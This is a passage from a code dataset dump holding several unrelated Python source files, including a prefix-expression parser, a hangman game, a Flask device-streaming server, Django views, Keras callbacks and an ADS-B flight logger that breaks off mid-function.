n\n\n n : /[0-9]+/\n\"\"\"\n\nclass Token(str):\n kind : str\n def __new__(cls, value, kind):\n tk = str.__new__(cls, value)\n tk.kind = kind\n return tk\n\n def __repr__(self):\n value = super().__repr__()\n return value\n\nREGEX_MAP = {\n \"n\" : r\"[0-9]+\",\n \"op\" : r\"[+*~]\",\n \"ws\" : r\"\\s+\",\n \"erro\": r\".\"\n}\n\n\nREGEX = re.compile(\"|\".join(f\"(?P<{k}>{v})\" for k, v in REGEX_MAP.items()))\n\ndef lex(str):\n tokens = []\n for m in REGEX.finditer(str):\n kind = m.lastgroup\n value = str[m.start():m.end()]\n tk = Token(value, kind)\n if kind == \"ws\":\n continue \n elif kind == \"erro\":\n raise SyntaxError(r\"Bad token: {tk}\")\n else:\n tokens.append(tk)\n return tokens\n\n\ndef parse(str):\n tokens = lex(str)\n tokens.append(\"$\")\n res = S(tokens)\n if tokens != [\"$\"]:\n raise SyntaxError(\"espera o fim do arquivo\")\n return res\n\n\ndef expect(token, tokens):\n aux_token = tokens.pop(0)\n if aux_token != token:\n raise SyntaxError(f\"Bad token: {aux_token}\")\n\n\ndef S(tokens):\n tk = tokens[0]\n\n if tk == \"+\":\n tokens.pop(0)\n left = S(tokens)\n right = S(tokens)\n return left + right\n\n elif tk == \"*\":\n tokens.pop(0)\n left = S(tokens)\n right = S(tokens)\n return left * right \n\n elif tk == \"*\":\n tokens.pop(0)\n left = S(tokens)\n right = S(tokens)\n return left * right\n\n elif tk == \"~\":\n tokens.pop(0)\n res = S(tokens)\n return ~ res\n \n tk = tokens.pop(0)\n if tk.kind == \"n\":\n return int(tk)\n\n\nsrc1 = \"~ 1\"\nsrc2 = \"+ 3 3\"\nsrc3 = \"* 2 6\"\nsrc4 = \"+ 7 * 2 5\"\nsrc5 = \"50\"\n\nassert parse(src1) == -2\nassert parse(src2) == 6\nassert parse(src3) == 12\nassert parse(src4) == 17\nassert parse(src5) == 50","sub_path":"respostas/algoritmos/rd-prog/rd-prog-q1.py","file_name":"rd-prog-q1.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"403770760","text":"import getpass #TODO add for 2p version\nimport string\n\nimport game_functions as core\n\ndef strikes_art(n):\n strike0 = \" ___ \\n\\\n / | \\n\\\n | \\n\\\n | \\n\\\n | \\n\\\n | \\n\\\n----------\\n\"\n\n strike1 = \" ___ \\n\\\n / | \\n\\\n o | \\n\\\n | \\n\\\n | \\n\\\n | \\n\\\n----------\\n\"\n\n strike2 = \" ___ \\n\\\n / | \\n\\\n o | \\n\\\n | | \\n\\\n | \\n\\\n | \\n\\\n----------\\n\"\n\n strike3 = \" ___ \\n\\\n / | \\n\\\n o | \\n\\\n /| | \\n\\\n | \\n\\\n | \\n\\\n----------\\n\"\n\n strike4 = \" ___ \\n\\\n / | \\n\\\n o | \\n\\\n /|\\ | \\n\\\n | \\n\\\n | \\n\\\n----------\\n\"\n\n strike5 = \" ___ \\n\\\n / | \\n\\\n o | \\n\\\n /|\\ | \\n\\\n / | \\n\\\n | \\n\\\n----------\\n\"\n\n strike6 = \" ___ \\n\\\n / | \\n\\\n o | \\n\\\n /|\\ | \\n\\\n / \\ | \\n\\\n | \\n\\\n----------\\n\"\n\n drawings = [strike0, strike1, strike2, strike3, strike4, strike5, strike6]\n return drawings[n]\n\ndef main_game():\n guess_pool = list(string.ascii_lowercase)\n \n target = getpass.getpass(\"What is the target word?\\n\") # TODO add for 2p version\n #target = \"cat\" # TODO get random word from list of common hangman words\n target_list = list(target)\n letters_remaining = []\n\n for i in target:\n if i not in letters_remaining:\n letters_remaining.append(i)\n \n check_word = \"*\" * len(target) # TODO allow for target with multiple words\n check_list = list(check_word)\n \n core.print_slow(\"Welcome to Hangman, good luck guessing the word!\\n\")\n\n strikes = 0\n while strikes < 6:\n core.print_slow(strikes_art(strikes))\n core.print_slow(\"\".join(check_list) + \"\\n\")\n user_guess = input(core.print_slow(\"\\nYour guess:\")) # TODO won't print slow\n\n if user_guess not in guess_pool:\n core.print_slow(\"That guess is either not valid or has already been used, please guess again.\\n\")\n \n elif user_guess not in letters_remaining:\n strikes += 1\n core.print_slow(\"You have %s incorrect guesses remaining.\\n\" %(str(6 - strikes)))\n \n elif user_guess in letters_remaining:\n guess_pool.remove(user_guess)\n letters_remaining.remove(user_guess)\n \n store_index = [i for i, x in enumerate(target_list) if x == user_guess]\n for i in store_index:\n check_list[i] = user_guess\n\n if len(letters_remaining) == 0:\n core.print_slow(\"\".join(check_list) + \"\\n\")\n return core.print_slow(\"You've won!\\n\")\n\n core.print_slow(strikes_art(strikes))\n return core.print_slow(\"Sorry you ran out of tries! The word you were trying to guess was: \\n%s\\n\" %(target))\n \ndef main():\n main_game()\n core.play_again(main_game)\n\nif __name__ == \"__main__\":\n main()","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"334923417","text":"\"\"\"\nThis script runs the application using a development server.\nIt contains the definition of routes and views for the application.\n\"\"\"\n\n\nfrom flask import (\n render_template,\n Flask,\n Response,\n stream_with_context,\n url_for,\n render_template,\n redirect,\n request,\n)\nfrom json import dumps\nfrom forms import DeviceConfigureForm, DeviceScanForm\nfrom sources import get_source\nimport json\nfrom flask_cors import CORS\nfrom errors import errors\n\napp = Flask(__name__, static_folder=\"./webui/build\", static_url_path=\"/\")\napp.register_blueprint(errors)\nCORS(app, resources={r\"/*\": {\"origins\": \"*\"}})\n\n\n\napp.config[\"CONFIG_SAMPLES_PER_PACKET\"] = 32\napp.config[\"SECRET_KEY\"] = \"any secret string\"\napp.config[\"CONFIG_SAMPLE_RATE\"] = None\napp.config[\"SOURCE_SAMPLES_PER_PACKET\"] = None\napp.config[\"DATA_SOURCE\"] = None\napp.config[\"CONFIG_COLUMNS\"] = []\napp.config[\"SERIAL_PORT\"] = None\napp.config[\"TCPIP\"] = None\napp.config[\"BLE_DEVICE_ID\"] = None\napp.config[\"STREAMING_SOURCE\"] = None\napp.config[\"RESULT_SOURCE\"] = None\napp.config[\"MODE\"] = \"\"\napp.config[\"STREAMING\"] = False\napp.config[\"BAUD_RATE\"] = 460800\napp.config[\"CLASS_MAP\"] = None\napp.config[\"TEST_DEVICE\"] = None\n\n# Make the WSGI interface available at the top level so wfastcgi can get it.\nwsgi_app = app.wsgi_app\n\n\ndef cache_config(config):\n tmp = {\n \"CONFIG_SAMPLE_RATE\": app.config[\"CONFIG_SAMPLE_RATE\"],\n \"DATA_SOURCE\": app.config[\"DATA_SOURCE\"],\n \"CONFIG_COLUMNS\": app.config[\"CONFIG_COLUMNS\"],\n \"BLE_DEVICE_ID\": app.config[\"BLE_DEVICE_ID\"],\n \"SERIAL_PORT\": app.config[\"SERIAL_PORT\"],\n \"MODE\": app.config[\"MODE\"],\n \"TCPIP\": app.config[\"TCPIP\"],\n \"TEST_DEVICE\": app.config[\"TEST_DEVICE\"],\n \"SOURCE_SAMPLES_PER_PACKET\":app.config[\"SOURCE_SAMPLES_PER_PACKET\"]\n }\n json.dump(tmp, open(\"./.config.cache\", \"w\"))\n\n\n@app.route(\"/\")\ndef main():\n return app.send_static_file(\"index.html\")\n\n\ndef get_device_id():\n if app.config[\"DATA_SOURCE\"] == \"BLE\":\n return app.config[\"BLE_DEVICE_ID\"]\n if app.config[\"DATA_SOURCE\"] == \"SERIAL\":\n return app.config[\"SERIAL_PORT\"]\n if app.config[\"DATA_SOURCE\"] == \"TCPIP\":\n return app.config[\"TCPIP\"]\n else:\n return app.config[\"TEST_DEVICE\"]\n\n\ndef parse_current_config():\n\n ret = {}\n ret[\"sample_rate\"] = app.config[\"CONFIG_SAMPLE_RATE\"]\n ret[\"column_location\"] = dict()\n ret[\"samples_per_packet\"] = app.config[\"CONFIG_SAMPLES_PER_PACKET\"]\n ret[\"source_samples_per_packet\"] = app.config[\"SOURCE_SAMPLES_PER_PACKET\"]\n ret[\"source\"] = app.config[\"DATA_SOURCE\"]\n ret[\"device_id\"] = get_device_id()\n ret[\"streaming\"] = app.config[\"STREAMING\"]\n ret[\"baud_rate\"] = app.config[\"BAUD_RATE\"]\n ret[\"mode\"] = app.config[\"MODE\"].lower()\n\n if app.config[\"CONFIG_COLUMNS\"]:\n ret[\"column_location\"] = app.config[\"CONFIG_COLUMNS\"]\n else:\n ret[\"column_location\"] = {}\n\n return ret\n\n\ndef get_config():\n\n ret = parse_current_config()\n\n return Response(dumps(ret), mimetype=\"application/json\")\n\n\n@app.route(\"/scan\", methods=[\"POST\"])\ndef scan():\n form = DeviceScanForm()\n\n print(form.data[\"source\"].upper())\n\n source = get_source(\n app.config,\n device_id=None,\n data_source=form.data[\"source\"].upper(),\n connect=False,\n )\n\n device_id_list = source.list_available_devices()\n\n return Response(json.dumps(device_id_list), mimetype=\"application/json\")\n\n\n@app.route(\"/connect\", methods=[\"GET\"])\ndef connect():\n\n if app.config[\"MODE\"] == \"DATA_CAPTURE\":\n if app.config.get(\"STREAMING_SOURCE\", None) is None:\n app.config[\"STREAMING_SOURCE\"] = get_source(\n app.config,\n device_id=get_device_id(),\n data_source=app.config[\"DATA_SOURCE\"],\n source_type=\"DATA_CAPTURE\",\n )\n\n app.config.get(\"STREAMING_SOURCE\").send_connect()\n\n app.config[\"STREAMING\"] = True\n\n elif app.config[\"MODE\"] == \"RESULTS\":\n if app.config.get(\"RESULTS_SOURCE\", None) is None:\n app.config[\"RESULTS_SOURCE\"] = get_source(\n app.config,\n device_id=get_device_id(),\n data_source=app.config[\"DATA_SOURCE\"],\n source_type=\"RESULTS\",\n )\n\n app.config[\"STREAMING\"] = True\n\n app.config[\"RESULTS_SOURCE\"].send_connect()\n\n return get_config()\n\n\n@app.route(\"/config\", methods=[\"GET\", \"POST\"])\ndef config():\n form = DeviceConfigureForm()\n\n if request.method == \"POST\":\n disconnect()\n app.config[\"STREAMING\"] = False\n\n source = get_source(\n app.config,\n data_source=form.data[\"source\"].upper(),\n source_type=\"DATA_CAPTURE\",\n device_id=form.data[\"device_id\"],\n )\n\n print(\"SET CONFIG\")\n source.set_config(app.config)\n\n print(\"SEND CONNECT\")\n source.send_connect()\n app.config[\"STREAMING\"] = True\n\n app.config[\"MODE\"] = \"DATA_CAPTURE\"\n\n cache_config(app.config)\n\n app.config[\"STREAMING_SOURCE\"] = source\n\n print(app.config)\n\n ret = parse_current_config()\n\n return Response(dumps(ret), mimetype=\"application/json\")\n\n\n@app.route(\"/config-results\", methods=[\"GET\", \"POST\"])\ndef config_results():\n form = DeviceConfigureForm()\n\n if request.method == \"POST\":\n disconnect()\n app.config[\"STREAMING\"] = False\n\n source = get_source(\n app.config,\n data_source=form.data[\"source\"].upper(),\n device_id=form.data[\"device_id\"],\n source_type=\"RESULTS\",\n )\n\n source.set_config(app.config)\n\n source.send_connect()\n\n app.config[\"STREAMING\"] = True\n\n app.config[\"MODE\"] = \"RESULTS\"\n\n app.config[\"RESULT_SOURCE\"] = source\n\n cache_config(app.config)\n\n return get_config()\n\n ret = parse_current_config()\n\n return Response(dumps(ret), mimetype=\"application/json\")\n\n\n@app.route(\"/stream\")\ndef stream():\n\n if app.config.get(\"STREAMING_SOURCE\", None) is None:\n app.config[\"STREAMING_SOURCE\"] = get_source(\n app.config,\n device_id=get_device_id(),\n data_source=app.config[\"DATA_SOURCE\"],\n source_type=\"DATA_CAPTURE\",\n )\n\n app.config[\"STREAMING\"] = True\n print(\"source was none\")\n\n return Response(\n stream_with_context(app.config[\"STREAMING_SOURCE\"].read_data()),\n mimetype=\"application/octet-stream\",\n )\n\n\n@app.route(\"/results\")\ndef results():\n\n if app.config.get(\"RESULT_SOURCE\", None) is None:\n\n app.config[\"RESULT_SOURCE\"] = get_source(\n app.config,\n device_id=get_device_id(),\n data_source=app.config[\"DATA_SOURCE\"],\n source_type=\"RESULTS\",\n )\n\n app.config[\"STREAMING\"] = True\n\n return Response(\n stream_with_context(app.config[\"RESULT_SOURCE\"].read_result_data()),\n mimetype=\"application/octet-stream\",\n )\n\n\n@app.route(\"/disconnect\")\ndef disconnect():\n\n source = app.config.get(\"STREAMING_SOURCE\", None)\n source_resutlts = app.config.get(\"RESULT_SOURCE\", None)\n\n if source is not None:\n source.disconnect()\n\n del app.config[\"STREAMING_SOURCE\"]\n app.config[\"STREAMING_SOURCE\"] = None\n\n print(\"Disconnected from Streaming Source.\")\n\n if source_resutlts is not None:\n source_resutlts.disconnect()\n\n del app.config[\"RESULT_SOURCE\"]\n app.config[\"RESULT_SOURCE\"] = None\n\n print(\"Disconnected from Result Source.\")\n\n app.config[\"STREAMING\"] = False\n\n return get_config()\n\n\nif __name__ == \"__main__\":\n import os\n\n HOST = os.environ.get(\"SERVER_HOST\", \"localhost\")\n try:\n PORT = int(os.environ.get(\"SERVER_PORT\", \"5555\"))\n except ValueError:\n PORT = 5555\n\n if os.path.exists(\"./.config.cache\"):\n app.config.update(json.load(open(\"./.config.cache\", \"r\")))\n\n app.run(HOST, 5555 , debug=True)\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"483636565","text":"import socket\nfrom Position import Position\nfrom State import State\nfrom Handle import handle\n\ndef Init(name):\n\tmsg = \"\"\n\tmsg += \"Name:\" + name\n\tmsg += \";Board:\"\n\tboard = \"5,\"*21 + (\"5,\" + \"0,\"*19 + \"5,\")*19 + \"5,\"*20 + \"5\"\n\tmsg += board\n\tmsg += \";Turn:Black\"\n\treturn msg\n\t\n\n\n\n\n\nSIZE = 1024\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n#sock.bind(('192.168.1.2', 8001)) \nsock.bind(('localhost', 8001)) \nsock.listen(5)\n\nconnection1, address1 = sock.accept()\nstate_msg = Init(\"Black\")\nconnection1.send(state_msg)\n\nstate = State(state_msg)\n\nconnection2, address2 = sock.accept()\nstate_msg = Init(\"White\")\nconnection2.send(state_msg)\n\n\nwhile True:\n\n\tif state.Turn == \"Black\":\n\t\tconnect = connection1\n\telse:\n\t\tconnect = connection2\n\n\tpos_msg_id = connect.recv(SIZE)\n\tid, pos_msg = pos_msg_id.split(\";\")\n\n\tpos = Position(pos_msg, state.Turn)\n\t\n\tstate = handle(state.Board, pos)\n\n\tconnection1.send(state.to_str())\n\tconnection2.send(state.to_str())\n","sub_path":"Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"293735047","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 12 10:46:03 2018\n\n@author: jakob\n\"\"\"\nfrom keras.callbacks import Callback, TensorBoard, LambdaCallback\nfrom vis_utils import to_tensor, load_2d\nfrom keras import models\nimport math\nimport numpy as np\nimport imageio\nimport matplotlib.pylab as plt\nimport keras.backend.tensorflow_backend as Ki\n\nclass CustomCallback(Callback):\n \n class activationHistory(Callback):\n def __init__(self, shape, img_path='OASIS/Test/predict/anormal.png'):\n self.batch_activations_model = []\n img = load_2d(img_path, (shape))\n self.img_tensor = to_tensor(img) \n def on_batch_end(self, batch, logs={}):\n with Ki.tf.device('/cpu:0'):\n lays=len(self.model.layers)\n #getting layer outputs, init new model\n layer_outputs = [layer.output for layer in self.model.layers[:lays]]\n activation_model = models.Model(inputs=self.model.input, outputs=layer_outputs)\n #with Ki.tf.device('/cpu:2'): \n activations = activation_model.predict(self.img_tensor) \n self.batch_activations_model.append(activations)\n #self.batch_activations_model.append(self.model.get_weights())\n return\n def get_stack(self):\n return self.batch_activations_model\n \n def tensorCall():\n return TensorBoard(log_dir='./Graph', histogram_freq=0, write_graph=True, \n write_images=True)\n def weightsCall():\n \n def get_weights(epoch,logs):\n print(\"end of epoch: \" + str(epoch)) #for instance\n \n return LambdaCallback(on_epoch_end=get_weights)\n \ndef make_gif(stack, layer_to_vis=0):\n \n \n print('start model_acti_gif')\n \n writer = imageio.get_writer('normlayer.gif', mode='I', loop=1)\n shape = stack[0][layer_to_vis].shape[-2]\n features = stack[0][layer_to_vis].shape[-1]\n m = math.ceil(math.sqrt(features))\n grid = np.zeros((shape*m,shape*m))\n #grid = np.full((shape*m,shape*m),255)\n l = len(stack)\n \n for i in range(len(stack)):\n \n activations = stack[i]\n activations = activations[layer_to_vis]\n \n f=0 \n for c in range(m):\n for r in range(m):\n x=c*shape\n y=r*shape\n if f < features:\n acti = proc(activations[0, : ,: ,f])\n grid[x:x+shape, y:y+shape] = acti\n print('\\r[%i/%i] %i - %i - %i' % (i,l,f,r,c), end='')\n f += 1\n \n grid = grid.astype('uint8')\n writer.append_data(grid)\n\n writer.close()\n \ndef proc(activations):\n \n channel_image = activations\n channel_image -= channel_image.mean()\n channel_image /= channel_image.std()\n channel_image *= 64\n channel_image += 128\n channel_image = np.clip(channel_image, 0, 255).astype('uint8')\n return channel_image\n\ndef plot_history(history):\n \n # summarize history for accuracy\n plt.plot(history.history['acc'])\n plt.plot(history.history['val_acc'])\n plt.title('model accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n plt.show()\n # summarize history for loss\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n plt.show()\n ","sub_path":"model_utils.py","file_name":"model_utils.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"354385842","text":"from django.conf.urls import url\nimport MainApp.views as v\n\n\nurlpatterns = [\n\n # users\n url(r'^login', v.login_user),\n url(r'^logout', v.logout_user),\n url(r'^register', v.register_user),\n\n # customers\n url(r'^register-customer', v.register_customer),\n url(r'^customers', v.give_customers),\n\n\n # projects\n url(r'^create-project', v.create_project),\n url(r'^projects', v.give_projects),\n url(r'^project/(?P\\d*)', v.get_project),\n url(r'^update-project/(?P\\d*)', v.update_project),\n\n\n # task\n url(r'^create-task', v.create_task),\n url(r'^tasks', v.give_tasks),\n url(r'^task/(?P\\d*)', v.get_task),\n url(r'^update-task/(?P\\d*)', v.update_task),\n\n\n # task entries\n url(r'^create-entry', v.create_task_entry),\n url(r'^entries', v.give_entries),\n url(r'^entry/(?P\\d*)', v.get_entry),\n url(r'^update-entry/(?P\\d*)', v.update_entry),\n\n url(r'^start-entry/(?P\\d*)', v.start_task_entry),\n\n url(r'^handle-entry/(?P\\d*)', v.operate_task_entry),\n\n\n # other operations\n url(r'^', v.index),\n\n]\n","sub_path":"project/MainApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"511736560","text":"from django.shortcuts import render,redirect\nfrom django.http import HttpResponse\n\nfrom demo1.forms import MyForm\nfrom demo1.models import Truth\n# Create your views here.\ndef demo1(request):\n\tpass\ndef form(request):\n\treturn render(request,'form.html')\n\treturn render(request,'show.html')\n\tif request.method == 'GET':\n\t\tname = request.GET['name']\n\t\temail = request.GET['email']\n\t\tmobile = request.GET['mob']\n\t\tsalary = request.GET['sal']\n\t\tdata = [name,email,mobile,salary]\n\t\treturn HttpResponse(data)\ndef adddata(request):\n\tif request.method == 'GET':\n\t\tform = MyForm(request.GET)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('/getdata/')\n\t\telse:\n\t\t\tform = MyForm()\n\treturn render(request,'form.html',{'form':form})\n\ndef getdata(request):\n\tdata = Truth.objects.all()\n\treturn render(request,'show.html',{'data':data})\n\ndef delete(request,id):\n\t#return HttpResponse(id)\n\tdata = Truth.object.get(id=id)\n\tdata.delete()\n\treturn redirect('/getdata/')\n\ndef getdataforedit(request,id):\n\tdata = Truth.objects.get(id=id)\n\treturn render(request,'editdata.html',{'data':data})\n\ndef update(request,id):\n\tif request.method==\"GET\":\n\t\temp = Truth.objects.get(id=id)\n\t\tform = MyForm(request.GET,instance=emp)\n\t\tif form.is_valid():\n\t\t\ttry:\n\t\t\t\tform.save()\n\t\t\t\treturn redirect('/getdata')\n\t\t\texcept:\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tform = MyForm()\n\t\t\t\treturn render(request,\"editdata.html\",{'form':form})\n\n\n\n\n\t\t\n\n\n\n","sub_path":"demo1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"239299328","text":"from scipy import io\nimport numpy as np\nimport time\nimport torch\nfrom torch.nn import Upsample\nfrom bicubic import BicubicUp, BicubicDown\n\n\ndef compare_matlab(scale=2):\n mat = io.loadmat(\"bicubic.mat\")\n # d->data, d2->down sample by factor 'scale' ...\n d, d_scale = mat['d'], mat['d{}'.format(scale)]\n # u->data, u2->up sample by factor 'scale' ...\n u, u_scale = mat['u'], mat['u{}'.format(scale)]\n d = torch.tensor(d).unsqueeze(0).unsqueeze(0)\n u = torch.tensor(u).unsqueeze(0).unsqueeze(0)\n\n m_up = BicubicUp(scale, channel=1)\n out_u = m_up(u)\n out_u = out_u[0, 0].numpy()\n err_u = np.sum((out_u - u_scale) ** 2)\n print(\"Error of up sample scale {}:\\t{:.3f}\".format(scale, err_u))\n\n m_down = BicubicDown(scale, channel=1)\n out_d = m_down(d)\n out_d = out_d[0, 0].numpy()\n err_d = np.sum((out_d - d_scale) ** 2)\n print(\"Error of down sample scale {}:\\t{:.3f}\\n\".format(scale, err_d))\n\n\ndef compare_speed(cuda=False):\n x = torch.rand(64, 3, 256, 256)\n m_lazy = BicubicUp(2, channel=3, cuda=cuda)\n m_official = Upsample(scale_factor=2, mode='bicubic', align_corners=False)\n if cuda:\n x = x.cuda()\n m_official.cuda()\n\n t = time.time()\n for i in range(10):\n y = m_lazy(x)\n print(\"lazy implementation on {}:\\t{:.4f}s\".format(\"GPU\" if cuda else \"CPU\", time.time()-t))\n\n t = time.time()\n for i in range(10):\n y = m_official(x)\n print(\"official implementation on {}:\\t{:.4f}s\\n\".format(\"GPU\" if cuda else \"CPU\", time.time() - t))\n\n\nif __name__ == '__main__':\n # whether the output is same as matlab's\n compare_matlab(2)\n compare_matlab(3)\n compare_matlab(4)\n\n if torch.__version__ >= \"1.1.0\":\n # compare the speed of up sample with official implementation\n compare_speed(False)\n if torch.cuda.is_available():\n compare_speed(True)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"381480383","text":"#!/usr/bin/python\n\n#================================================================================#\n# ADS-B FEEDER PORTAL #\n# ------------------------------------------------------------------------------ #\n# Copyright and Licensing Information: #\n# #\n# The MIT License (MIT) #\n# #\n# Copyright (c) 2015-2016 Joseph A. Prochazka #\n# #\n# Permission is hereby granted, free of charge, to any person obtaining a copy #\n# of this software and associated documentation files (the \"Software\"), to deal #\n# in the Software without restriction, including without limitation the rights #\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #\n# copies of the Software, and to permit persons to whom the Software is #\n# furnished to do so, subject to the following conditions: #\n# #\n# The above copyright notice and this permission notice shall be included in all #\n# copies or substantial portions of the Software. #\n# #\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE #\n# SOFTWARE. #\n#================================================================================#\n\n# WHAT THIS DOES:\n# ---------------------------------------------------------------\n#\n# 1) Read aircraft.json generated by dump1090-mutability.\n# 2) Add the flight to the database if it does not already exist.\n# 3) Update the last time the flight was seen.\n\nimport datetime\nimport json\nimport time\nimport os\n#urllib2 is deprecated in python3\ntry:\n # For Python 3.0 and later\n from urllib.request import urlopen\nexcept ImportError:\n # Fall back to Python 2's urllib2\n from urllib2 import urlopen\n\ndef log(string):\n #print(string) # uncomment to enable debug logging\n return\n\n# Read the configuration file.\nwith open(os.path.dirname(os.path.realpath(__file__)) + '/config.json') as config_file:\n config = json.load(config_file)\n\n# Import the needed database library.\nif config[\"database\"][\"type\"] == \"mysql\":\n import MySQLdb\nelse:\n import sqlite3\n\nclass FlightsProcessor(object):\n def __init__(self, config):\n self.config = config\n self.dbType = config[\"database\"][\"type\"]\n # List of required keys for position data entries\n self.position_keys = ('lat', 'lon', 'altitude', 'speed', 'track', 'vert_rate', 'hex')\n\n def setupDBStatements(self, formatSymbol):\n if hasattr(self, 'STMTS'):\n return\n mapping = { \"s\": formatSymbol }\n self.STMTS = {\n 'select_aircraft_count':\"SELECT COUNT(*) FROM adsb_aircraft WHERE icao = %(s)s\" % mapping,\n 'select_aircraft_id': \"SELECT id FROM adsb_aircraft WHERE icao = %(s)s\" % mapping,\n 'select_flight_count': \"SELECT COUNT(*) FROM adsb_flights WHERE flight = %(s)s\" % mapping,\n 'select_flight_id': \"SELECT id FROM adsb_flights WHERE flight = %(s)s\" % mapping,\n 'select_position': \"SELECT message FROM adsb_positions WHERE flight = %(s)s AND message = %(s)s ORDER BY time DESC LIMIT 1\" % mapping,\n 'insert_aircraft': \"INSERT INTO adsb_aircraft (icao, firstSeen, lastSeen) VALUES (%(s)s, %(s)s, %(s)s)\" % mapping,\n 'insert_flight': \"INSERT INTO adsb_flights (aircraft, flight, firstSeen, lastSeen) VALUES (%(s)s, %(s)s, %(s)s, %(s)s)\" % mapping,\n 'insert_position_sqwk': \"INSERT INTO adsb_positions (flight, time, message, squawk, latitude, longitude, track, altitude, verticleRate, speed, aircraft) VALUES (%(s)s, %(s)s, %(s)s, %(s)s, %(s)s, %(s)s, %(s)s, %(s)s, %(s)s, %(s)s, %(s)s)\" % mapping,\n 'insert_position': \"INSERT INTO adsb_positions (flight, time, message, latitude, longitude, track, altitude, verticleRate, speed, aircraft) VALUES (%(s)s, %(s)s, %(s)s, %(s)s, %(s)s, %(s)s, %(s)s, %(s)s, %(s)s, %(s)s)\" % mapping,\n 'update_aircraft_seen': \"UPDATE adsb_aircraft SET lastSeen = %(s)s WHERE icao = %(s)s\" % mapping,\n 'update_flight_seen': \"UPDATE adsb_flights SET aircraft = %(s)s, lastSeen = %(s)s WHERE flight = %(s)s\" % mapping\n }\n\n def connectDB(self):\n if self.dbType == \"sqlite\": ## Connect to a SQLite database.\n self.setupDBStatements(\"?\")\n return sqlite3.connect(self.config[\"database\"][\"db\"])\n else: ## Connect to a MySQL database.\n self.setupDBStatements(\"%s\")\n return MySQLdb.connect(host=self.config[\"database\"][\"host\"],\n user=self.config[\"database\"][\"user\"],\n passwd=self.config[\"database\"][\"passwd\"],\n db=self.config[\"database\"][\"db\"])\n\n def processAircraftList(self, aircraftList):\n db = self.connectDB()\n # Get Database cursor handle\n self.cursor = db.cursor()\n # Assign the time to a variable.\n self.time_now = datetime.datetime.utcnow().strftime(\"%Y/%m/%d %H:%M:%S\")\n\n for aircraft in aircraftList:\n self.processAircraft(aircraft)\n\n # Close the database connection.\n db.commit()\n db.close()\n\n def processAircraft(self, aircraft):\n hexcode = aircraft[\"hex\"]\n # Check if this aircraft was already seen.\n self.cursor.execute(self.STMTS['select_aircraft_count'], (hexcode,))\n row_count = self.cursor.fetchone()\n if row_count[0] == 0:\n # Insert the new aircraft.\n log(\"Added Aircraft: \" + hexcode)\n self.cursor.execute(self.STMTS['insert_aircraft'], (hexcode, self.time_now, self.time_now,))\n else:\n # Update the existing aircraft.\n self.cursor.execute(self.STMTS['update_aircraft_seen'], (self.time_now, hexcode,))\n log(\"Updating Aircraft: \" + hexcode)\n # Get the ID of this aircraft.\n self.cursor.execute(self.STMTS['select_aircraft_id'], (hexcode,))\n row = self.cursor.fetchone()\n aircraft_id = row[0]\n log(\"\\tFound Aircraft ID: \" + str(aircraft_id))\n\n # Check that a flight is tied to this track.\n if aircraft.has_key('flight'):\n self.processFlight(aircraft_id, aircraft)\n\n def processFlight(self, aircraft_id, aircraft):\n flight = aircraft[\"flight\"].strip()\n # Check to see if the flight already exists in the database.\n self.cursor.execute(self.STMTS['select_flight_count'], (flight,))\n row_count = self.cursor.fetchone()\n if row_count[0] == 0:\n # If the flight does not exist in the database add it.\n params = (aircraft_id, flight, self.time_now, self.time_now,)\n self.cursor.execute(self.STMTS['insert_flight'], params)\n log(\"\\t\\tAdded Flight: \" + flight)\n else:\n # If it already exists pdate the time it was last seen.\n params = (aircraft_id, self.time_now, flight,)\n self.cursor.execute(self.STMTS['update_flight_seen'], params)\n log(\"\\t\\tUpdated Flight: \" + flight)\n # Get the ID of this flight.\n self.cursor.execute(self.STMTS['select_flight_id'], (flight,))\n row = self.cursor.fetchone()\n flight_id = row[0]\n\n # Check if position data is available.\n if (all (k in aircraft for k in self.position_keys) and aircraft[\"altitude\"] != \"ground\"):\n self.processPositions(flight_id, aircraft)\n\n def processPositions(self, flight_id, aircraft):\n # Get the ID of this aircraft.\n hexcode = aircraft[\"hex\"]\n 